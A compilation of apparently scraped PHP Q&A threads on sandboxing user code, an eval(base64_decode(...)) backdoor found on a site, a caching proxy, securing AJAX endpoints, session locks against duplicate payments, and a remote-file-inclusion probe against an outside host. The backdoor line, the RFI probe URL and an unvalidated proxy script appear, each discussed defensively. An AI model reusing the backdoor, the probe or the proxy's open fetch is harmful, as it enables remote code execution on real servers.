I've been thinking for a while about the idea of letting users submit code through a website and run it on the web server. It's not a new idea - many websites allow users to "test" their code online - such as http://ideone.com/.
For example: let's say we have a form containing a <textarea> element in which the user enters a piece of code and then submits it. The server reads the POST data, saves it as a PHP file, and require()s it wrapped in ob_*() output buffering calls. The captured output is then presented to the user.
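For concreteness, a minimal sketch of that flow might look like this (the 'code' field name and output handling are placeholders of mine, and of course this alone does nothing to make the submitted code safe):

<?php
// Minimal sketch of the flow above. The field name 'code' is an assumption,
// and none of this makes untrusted code safe to run on its own.
// The submitted snippet is expected to contain its own <?php opening tag.
$code = isset($_POST['code']) ? $_POST['code'] : '';

$file = tempnam(sys_get_temp_dir(), 'usercode_');   // temporary file holding the submitted code
file_put_contents($file, $code);

set_time_limit(5);            // cap execution time for this request
ob_start();                   // capture whatever the snippet prints
require $file;                // run the user's code
$output = ob_get_clean();     // collect the captured output
unlink($file);

echo '<pre>' . htmlspecialchars($output) . '</pre>';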
My question is: how to do it properly? Things that we should take into account [and possible solutions]:
security: the user must not be able to do anything malicious [php.ini's disable_functions],
stability: the user must not be able to kill the web server by submitting while(true){} [set_time_limit()],
performance: the server returns an answer within an acceptable time,
control: the user can do anything that does not violate the previous points.
I would prefer PHP-oriented answers, but a general approach is also welcome. Thank you in advance.
I would think about this problem one level higher, above and outside of the web server. Have a very unprivileged, jailed, chroot'ed standalone process for running these uploaded PHP scripts; then it doesn't matter which PHP functions are enabled or not, they will fail based on permissions and lack of access.
Have a parent process that monitors how long the above-mentioned "worker" process has been running; if it's been running too long, kill it and report a timeout error back to the end user.
Obviously there are many implementation details to work out as to how to run this system asynchronously outside of the browser request, but I think it would provide a pretty secure way to run your untrusted PHP scripts.
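As a rough sketch of the watchdog part only (the interpreter path, jail path and 5-second limit are assumptions of mine, and the chroot/privilege-dropping setup is left out entirely):

<?php
// Rough sketch: run the uploaded script in a separate, unprivileged php
// process and kill it if it runs longer than allowed.
// The paths and the 5-second limit are assumptions.
$cmd  = '/usr/bin/php ' . escapeshellarg('/jail/uploaded_script.php');
$spec = array(1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
$proc = proc_open($cmd, $spec, $pipes);

stream_set_blocking($pipes[1], false);
$output  = '';
$start   = time();
$timeout = 5;

while (true) {
    $output .= stream_get_contents($pipes[1]);   // drain output as it arrives
    $status  = proc_get_status($proc);
    if (!$status['running']) {
        break;                                   // worker finished by itself
    }
    if (time() - $start > $timeout) {
        proc_terminate($proc, 9);                // ran too long: kill it
        $output .= "\n[timeout: script was killed]";
        break;
    }
    usleep(100000);                              // poll every 100 ms
}
proc_close($proc);
echo $output;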
Wouldn't disabling functions in your server's ini file limit some of the functions of the application itself?
You'll have to do some hardcore sanitization on the POST data and strip "illegal" code there. Combined with the other methods you describe, that might make it work.
Just remember: sanitize the everloving daylight out of that POST data.
I need to understand the code below:
eval(base64_decode($_REQUEST['comment']));
It uses a lot of CPU, and the page contains only this code.
That could literally run anything, so there's no way of knowing. It takes the input from $_REQUEST['comment'], base64 decodes it, then runs it as PHP code.
For example, if cGhwaW5mbygpOw== was passed, it would execute phpinfo();.
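You can check that decoding yourself:

<?php
// Decoding the example payload shows exactly what would be eval()'d:
echo base64_decode('cGhwaW5mbygpOw==');   // prints: phpinfo();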
On a side note, those sorts of code snippets are usually a red flag and are commonly used as back-doors.
This code base64_decodes some input, and then evaluates it as PHP code. What ultimately ends up being executed depends on the contents of the comment field.
I am guessing that you found this inserted into the code on your page, and it means that your site was in some way compromised. It means that literally anyone can write any PHP code to do anything, base64_encode() it, and post it to your site in the 'comment' field, and the server will execute it.
By the time you actually notice it using a lot of resources, it is probably being used to send spam or DoS someone; as long as that code is there, it can be used to compromise your server further.
Basically, if you ever find something that starts with eval(base64_decode(... it will be doing bad things.
Source: 5 years as a sysadmin for a web hosting company.
This will be a newbie question, but I'm learning PHP for one sole purpose (at the moment): to implement a solution. Everything I've learned about PHP was learned in the last 18 hours.
The goal is adding indirection to my JavaScript GET requests to allow cross-domain access to another website. I also don't want to hammer said website, so I want to put throttling safeguards in place. I can't rely on doing that in JavaScript, because that can't account for other peers sending their own requests.
So right now I have the following makeshift code, without any throttling measures:
<?php
$expires = 15;                       // cache lifetime in seconds

if (empty($_GET["target"]))
    exit();

$fn   = md5($_GET["target"]);        // cache key derived from the target URL
$file = "cache/" . $fn;              // path of the cached copy

if (empty($_GET["cache"])) {
    // Serve the cached copy if it exists and is still fresh,
    // otherwise fetch the target directly.
    if (is_file($file) && time() - filemtime($file) <= $expires)
        echo file_get_contents($file);
    else
        echo file_get_contents($_GET["target"]);
} elseif (isset($_GET["data"])) {
    // Store a fetched response body in the cache for later requests.
    file_put_contents($file, $_GET["data"]);
}
?>
It works, as far as I can tell (it doesn't account for the improbable hash collision). Now what I want to know, and what my Google searches refuse to turn up, is how PHP actually launches and when it ends.
Obviously, if I were running my own web server I'd have a bit more insight into this; I'm not, and I have no shell access either.
Basically I'm trying to figure out whether I can control, in the code, when the script ends, and whether every GET request to the PHP file launches a new instance of the script or whether it can "wake up" the same script. The reason is that I want to track whether a request was already sent to 'target' within the last n milliseconds, and it seems a bit wasteful to dump that value to a file and read it back, over and over, for something that doesn't need to be kept in memory for very long.
Every HTTP request starts a new instance of the interpreter; it's basically an implementation detail whether this is a whole new process, or a reuse of an existing one.
This generally pushes you towards good, simple, scalable designs: you can run multiple server processes and threads, and you won't get varying behaviour depending on whether the request goes back to the same instance or not.
Loading a recently-touched file will be very fast on Linux, since it will come right from the cache. Don't worry about it.
Do worry about the fact that by directly appending request parameters to the path you have a serious security hole: people can get data=../../../etc/passwd and so on. Read http://www.php.net/manual/en/security.variables.php and so on. (In this particular example you're hashing the inputs before putting them in the path so it's not a practical problem but it is something to watch for.)
More generally, if you want to hold a cache across multiple requests the typical thing these days is to use memcached.
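For example, a throttling/caching sketch with the Memcached extension might look like this, assuming the extension and a local memcached server are available (which may not be the case on shared hosting); the key names and the 1-second and 15-second windows are assumptions:

<?php
// Cross-request throttle/cache sketch; server address, key names and
// the 1-second / 15-second windows are assumptions.
$mc = new Memcached();
$mc->addServer('127.0.0.1', 11211);

$target = $_GET['target'];
$key    = md5($target);

if ($mc->get('last_fetch_' . $key) !== false) {
    // A request for this target already went out within the last second.
    $cached = $mc->get('body_' . $key);
    exit($cached !== false ? $cached : 'throttled');
}
$mc->set('last_fetch_' . $key, time(), 1);   // throttle marker, 1 s TTL

$body = file_get_contents($target);          // fetch the remote page
$mc->set('body_' . $key, $body, 15);         // cache the body for 15 s
echo $body;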
PHP works on a per-request basis, i.e. each request for a PHP file is handled by a new instance of the script. Each instance ends, generally, when the request finishes. You can, however, use sessions to save data between requests for a specific user; a minimal throttle sketch follows the list below.
For basic use of sessions look into:
session_start()
$_SESSION
session_destroy()
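As a minimal sketch of that for your throttling idea (the 500 ms window is an assumption; note a session is per visitor, so a shared store such as a file or memcached is still needed if you want one limit across all visitors):

<?php
// Per-visitor throttle using the session; the 500 ms window is an assumption.
session_start();

$now  = microtime(true);
$last = isset($_SESSION['last_request']) ? $_SESSION['last_request'] : 0;

if ($now - $last < 0.5) {
    header('HTTP/1.1 429 Too Many Requests');   // reject the request
    exit('throttled');
}
$_SESSION['last_request'] = $now;

// ... go on and contact the target / serve the cache here ...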
On my website, I have a search.php page that makes $.get requests to pages like search_data.php and search_user_data.php etc.
The problem is all of these files are located within my public html folder.
Someone could browse directly to www.mysite.com/search_user_data.php. All of the data it processes is properly escaped and handled, but on a professional level it feels inadequate to even have this file within public reach.
I have tried moving the sensitive files above my web root; however, since jQuery makes $.get requests and passes variables in the URL, this doesn't work.
Does anyone know any methods to firmly secure these vulnerable pages?
What you describe is normal.
You have PHP files that are reachable in your www directory so apache (or your favored webserver) can read and process them.
If you move them out you can't reach them anymore so there is no real option of that sort.
After all, your PHP files for AJAX are just regular PHP files; the rest of your project presumably contains PHP files too, right? They are no more or less at risk than any other script on your server.
Make sure you program "clean". Think about evil requests when writing your php functions, not after writing them.
As you already did: correctly quote all incoming input that might hit a database or sensitive function.
You can add security checks on your incoming values and create an automated email if you detect someone trying evil stuff. So you'll likely receive a warning in such cases.
But on the downside: you'll regularly receive warnings because some companies automatically scan websites for possible bugs, so those scans will trigger alerts as well.
On top of writing your code as "secure" as you can, you may want to add a referer check in your code. That means your PHP file will only react if your website was given as referer when accessing it. That's enough to block 80% of the kids out there.
But on the downside: a few internet users do not send a referer at all, and some proxies filter it out. (I would personally ignore them; half the web breaks for them anyway.)
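A sketch of such a check (the host name matches the one in your question; remember the Referer header is client-supplied, so this is only a speed bump):

<?php
// Naive referer check; "www.mysite.com" stands in for your own host.
// The header can be forged, so this only stops casual abuse.
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$host    = parse_url($referer, PHP_URL_HOST);

if ($host !== 'www.mysite.com') {
    header('HTTP/1.1 403 Forbidden');
    exit;
}
// ... normal search_user_data.php processing continues here ...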
One more layer of protection can be added with .htaccess; you can do most of it within PHP, but it might still be of interest to you: http://httpd.apache.org/docs/2.0/howto/htaccess.html
You can generate a uid each time your page is loaded and store it in $_SESSION['uid']. You pass this uid to JavaScript like this:
var uid = "<?php echo $_SESSION['uid']; ?>";
Then you send it with your GET request and compare it to the value stored in $_SESSION:
if ($_GET['uid'] != $_SESSION['uid']) // Stop with an error message or send a forbidden header.
If it's ok, do what you need.
It's not perfect since someone can request search.php and get the current uid, and then request the other pages, but it may be the best possible solution.
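Put together, a rough sketch could look like this (the file names follow the question; the uniqid()-based token generation is an assumption, any hard-to-guess value works):

<?php
// search.php - issue the token when the page is rendered
session_start();
$_SESSION['uid'] = md5(uniqid(mt_rand(), true));   // token generation is an assumption
?>
<script>
var uid = "<?php echo $_SESSION['uid']; ?>";
$.get("search_user_data.php", { uid: uid, q: "some term" }, function (data) {
    // handle the response
});
</script>

<?php
// search_user_data.php - refuse to do any work without a matching token
session_start();
if (!isset($_GET['uid'], $_SESSION['uid']) || $_GET['uid'] !== $_SESSION['uid']) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}
// ... query the database and echo the result as before ...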
I need to use mutexes or semaphores in PHP, and it scares me. To clarify, I'm not scared of writing deadlock-free code that synchronizes properly or afraid of the perils of concurrent programming, but of how well PHP handles fringe cases.
Quick background: writing a credit card handler interface that sits between the users and the 3rd party credit card gateway. Need to prevent duplicate requests, and already have a system in place that works, but if the user hits submit (w/out JS enabled so I can't disable the button for them) milliseconds apart, a race condition ensues where my PHP script does not realize that a duplicate request has been made. Need a semaphore/mutex so I can ensure only one successful request goes through for each unique transaction.
I'm running PHP behind nginx via PHP-FPM with multiple processes on a multi-core Linux machine. I want to be sure that
1. semaphores are shared between all php-fpm processes and across all cores (i686 kernel);
2. php-fpm handles a PHP process crash while holding a mutex/semaphore and releases it accordingly;
3. php-fpm handles a session abort while holding a mutex/semaphore and releases it accordingly.
Yes, I know. Very basic questions, and it would be foolish to think that a proper solution doesn't exist for any other piece of software. But this is PHP, and it was most certainly not built with concurrency in mind, it crashes often (depending on which extensions you have loaded), and is in a volatile environment (PHP-FPM and on the web).
With regard to (1), I'm assuming that if PHP is using the POSIX functions, both these conditions hold true on an SMP i686 machine. As for (2), I see from briefly skimming the docs that there is a parameter that decides this behavior (though why one would ever want PHP to NOT release a mutex if the session is killed, I don't understand). But (3) is my main concern, and I don't know if it's safe to assume that php-fpm properly handles all fringe cases for me. I (obviously) don't ever want a deadlock, but I'm not sure I can trust PHP to never leave my code in a state where it cannot obtain a mutex because the session that grabbed it was either gracefully or ungracefully terminated.
I have considered using a MySQL LOCK TABLES approach, but there's even more doubt there: while I trust the MySQL lock more than the PHP lock, I fear that if PHP aborts a request (without crashing) while holding the MySQL session lock, MySQL might keep the table locked (especially because I can easily envision the code that would cause this to happen).
Honestly, I'd be most comfortable with a very basic C extension where I can see exactly what POSIX calls are being made and with what params to ensure the exact behavior I want.. but I don't look forward to writing that code.
Anyone have any concurrency-related best practices regarding PHP they'd like to share?
In fact, I think there is no need for a complex mutex/semaphore solution.
Form keys stored in a PHP $_SESSION are all you need. As a nice side effect, this method also protects your form against CSRF attacks.
In PHP, session data is locked by acquiring flock() on the session file, and session_start() blocks until the lock on the user's session is released. You just have to unset() the form key on the first valid request; the second request then has to wait until the first one releases the session.
However, when running in a load-balancing scenario involving multiple hosts (and not balanced by session or source IP), things get more complicated. For such a scenario, I'm sure you will find a valuable solution in this great paper: http://thwartedefforts.org/2006/11/11/race-conditions-with-ajax-and-php-sessions/
I reproduced your use case with the following demonstration. Just throw this file onto your web server and test it:
<?php
session_start();

if (isset($_REQUEST['do_stuff'])) {
    // do stuff
    if ($_REQUEST['uniquehash'] == $_SESSION['uniquehash']) {
        echo "valid, doing stuff now ... "; flush();
        // delete formkey from session
        unset($_SESSION['uniquehash']);
        // release session early - after committing, the session data is read-only
        session_write_close();
        sleep(20);
        echo "stuff done!";
    }
    else {
        echo "nope, {$_REQUEST['uniquehash']} is invalid.";
    }
}
else {
    // show form with formkey
    $_SESSION['uniquehash'] = md5("foo" . microtime() . rand(1, 999999));
?>
<html>
<head><title>session race condition example</title></head>
<body>
    <form method="POST">
        <input type="hidden" name="PHPSESSID" value="<?= session_id() ?>">
        <input type="text" name="uniquehash"
               value="<?= $_SESSION['uniquehash'] ?>">
        <input type="submit" name="do_stuff" value="Do stuff!">
    </form>
</body>
</html>
<?php } ?>
An interesting question, but you don't have any data or code to show.
In 80% of cases, the chances of anything nasty happening because of PHP itself are virtually zero if you follow the standard procedures and practices for stopping users from submitting forms multiple times; those apply to nearly every setup, not just PHP.
If you're in the 20% and your environment demands it, then one option is message queues, which I'm sure you are familiar with. Again, this idea is language-agnostic; it has nothing to do with languages. It's all about how data moves around.
You can store a random hash in an array within your session data and also print that hash as a hidden form input value. When a request comes in, if the hidden hash value exists in your session array, delete the hash from the session and process the form; otherwise, don't.
This should prevent duplicate form submits as well as help prevent CSRF attacks.
If the problem only arises when hitting a button milliseconds apart, wouldn't a software debouncer work? Like saving the time of a button press in a session variable and not allowing any more for, say, a second? Just a before-my-morning-coffee idea. Cheers.
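Something like this, perhaps (the one-second window is an assumption of mine); it relies on PHP's per-session locking to serialize two near-simultaneous requests from the same user:

<?php
// Session-based "debounce" sketch; the one-second window is an assumption.
session_start();   // also serializes concurrent requests sharing this session

$now = microtime(true);
if (isset($_SESSION['last_submit']) && $now - $_SESSION['last_submit'] < 1.0) {
    exit('Duplicate submission ignored.');
}
$_SESSION['last_submit'] = $now;

// ... hand the request to the payment gateway here ...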
What I do to prevent session race conditions in code is call PHP's session_write_close() after the last operation that stores data in the session (note that if you are using PHP 7, you need to disable default output buffering in php.ini). If you have time-consuming operations, it's better to execute them after session_write_close() has been invoked.
I hope it'll help someone, for me it saved my life :)
A guy calling himself ShiroHige is trying to hack my website.
He tries to open a page with this parameter:
mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???
If you look at that text file, it is just an echo and a die():
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
So what exploit is he trying to use (WordPress?)?
Edit 1:
I know he is trying to use RFI (remote file inclusion).
Are there some popular scripts that are exploitable this way (Drupal, phpBB, etc.)?
An obvious one: just an unsanitized include.
He is checking if the code gets executed.
If he finds his signature in a response, he will know that your site is ready to run whatever code he sends.
To prevent such attacks, one has to strictly sanitize filenames if they happen to be sent via HTTP requests.
A quick and cheap validation can be done using the basename() function:
if (empty($_GET['page']))
    $_GET['page'] = "index";   // default page name; ".php" is appended below

// basename() strips any directory part, so "../../etc/passwd" becomes just "passwd"
$page = $modules_dir . basename($_GET['page']) . ".php";

if (!is_readable($page)) {
    header("HTTP/1.0 404 Not Found");
    $page = "404.html";
}
include $page;
or using some regular expression.
There is also an extremely useful PHP configuration directive called
allow_url_include
which is set to off by default in modern PHP versions. So it protects you from such attacks automatically.
The vulnerability the attacker is aiming for is probably some kind of remote file inclusion, exploiting PHP's include and similar functions/constructs that allow loading a (remote) file and executing its contents:
Security warning
Remote file may be processed at the remote server (depending on the file extension and the fact if the remote server runs PHP or not) but it still has to produce a valid PHP script because it will be processed at the local server. If the file from the remote server should be processed there and outputted only, readfile() is much better function to use. Otherwise, special care should be taken to secure the remote script to produce a valid and desired code.
Note that using readfile() only avoids having the loaded file executed. It is still possible to exploit it to load other content that is then printed directly to the user. This can be used to print the plain contents of arbitrary files on the local file system (i.e. path traversal) or to inject code into the page (i.e. code injection). So the only protection is to validate the parameter value before using it.
See also OWASP’s Development Guide on “File System – Includes and Remote files” for further information.
It looks like the attack is designed to print out "ShiroHige" on vulnerable sites.
The idea being that if you use include but do not sanitize your input, the PHP in this text file is executed. If this works, then he can send any PHP code to your site and execute it.
A list of similar files can be found here. http://tools.sucuri.net/?page=tools&title=blacklist&detail=072904895d17e2c6c55c4783df7cb4db
He's trying to get your site to run his file. This would probably be an XSS attack? Not quite familiar with the terms (Edit: RFI - Remote file inclusion).
Odds are he doesn't know what he's doing. If there were a known way to get into WordPress like this, it would be very public by now.
I think it's only a first test of whether your site is vulnerable to external includes. If the echo is printed, he knows it's possible to inject code.
You're not giving much detail on the situation and leaving a lot to the imagination.
My guess is that he's trying to exploit allow_url_fopen. And right now he's just testing code to see what he can do. This is the first wave!
I think it is just a malicious URL. As soon as I entered it into my browser, Avast antivirus flagged it as malicious. So that PHP code may be deceiving, or he may just be testing. Another possibility is that the hacker has no bad intentions and just wants to show that he could get past your security.